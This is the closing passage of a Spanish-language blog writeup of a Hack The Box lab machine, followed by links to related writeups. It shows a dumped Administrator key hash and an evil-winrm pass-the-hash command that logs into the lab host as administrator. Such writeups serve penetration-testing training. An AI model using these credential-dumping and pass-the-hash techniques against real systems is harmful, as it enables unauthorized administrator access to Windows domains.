<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">Administrator:des-cbc-md5:fb8f321c64cea87f</span></span></code></pre> 
<p>Ahora tenemos el Hash de los administradores. Podemos usarlo en un ataque pass the hash.</p>
<pre class="shiki shiki-themes relative bg-neutral-200/30 dark:shadow-2xl code"><button aria-label="copy-button" class="copy-button absolute  z-20 top-2 right-2  rounded-md transition-all ease-in max-w-full max-h-fit dark:text-gray-600 text-gray-400 hover:text-indigo-500 dark:hover:text-indigo-400"><svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copy" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M8 8m0 2a2 2 0 0 1 2 -2h8a2 2 0 0 1 2 2v8a2 2 0 0 1 -2 2h-8a2 2 0 0 1 -2 -2z"></path> <path d="M16 8v-2a2 2 0 0 0 -2 -2h-8a2 2 0 0 0 -2 2v8a2 2 0 0 0 2 2h2"></path> </svg></button><span class="check-span absolute z-10 top-2 right-2  rounded-md transition-all ease-in opacity-0 text-green-600 dark:text-green-400 max-w-full max-h-fit "><svg class="icon icon-tabler icon-tabler-check" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M5 12l5 5l10 -10"></path> </svg></span><code><span class="line"><span style="color:#AB5959;--shiki-dark:#89DDFF">&gt;</span><span style="color:#393A34;--shiki-dark:#BABED8"> evil-winrm -u Administrator -i 10.10.10.175 -H 823452073d75b9d1cf70ebdf86c7f98e</span></span></code></pre> 
<p>somos administradores.</p> </div> <!-- related posts --> <footer> <h2 class="font-bold text-lg dark:text-white mb-6">Related Posts</h2> <section class="flex flex-col md:flex-row sm:justify-between gap-8"> <div class="flex flex-wrap gap-2"> <div class="min-h-full"> <img src="/_astro/image.QlzOxquK_12zkJG.webp" class="w-16 h-16 object-cover rounded-full  " alt="img of Broker - HTB Writeup" width="200" height="200" loading="lazy" decoding="async"> </div> <header class="flex justify-center items-center"> <a class="font-medium  hover:underline" href="/post/broker/"> Broker - HTB Writeup </a> </header> </div><div class="flex flex-wrap gap-2"> <div class="min-h-full"> <img src="/_astro/image.R-ZwdRw5_Z1hxbOg.webp" class="w-16 h-16 object-cover rounded-full  " alt="img of Crafty - HTB Writeup" width="200" height="200" loading="lazy" decoding="async"> </div> <header class="flex justify-center items-center"> <a class="font-medium  hover:underline" href="/post/crafty/"> Crafty - HTB Writeup </a> </header> </div><div class="flex flex-wrap gap-2"> <div class="min-h-full"> <img src="/_astro/image.262ecYt-_1fWT2n.webp" class="w-16 h-16 object-cover rounded-full  " alt="img of Devvortex - HTB Writeup" width="200" height="200" loading="lazy" decoding="async"> </div> <header class="flex justify-center items-center"> <a class="font-medium  hover:underline" href="/post/devvortex/"> Devvortex - HTB Writeup </a> </header> </div> </section> </footer> </article> </div>  </div> </article>  <footer class="flex justify-center items-center w-full px-16 h-28 border-t-2">
&copy; 2024 Fullaw4ke. All rights reserved.
</footer> </main>    </body> </html> 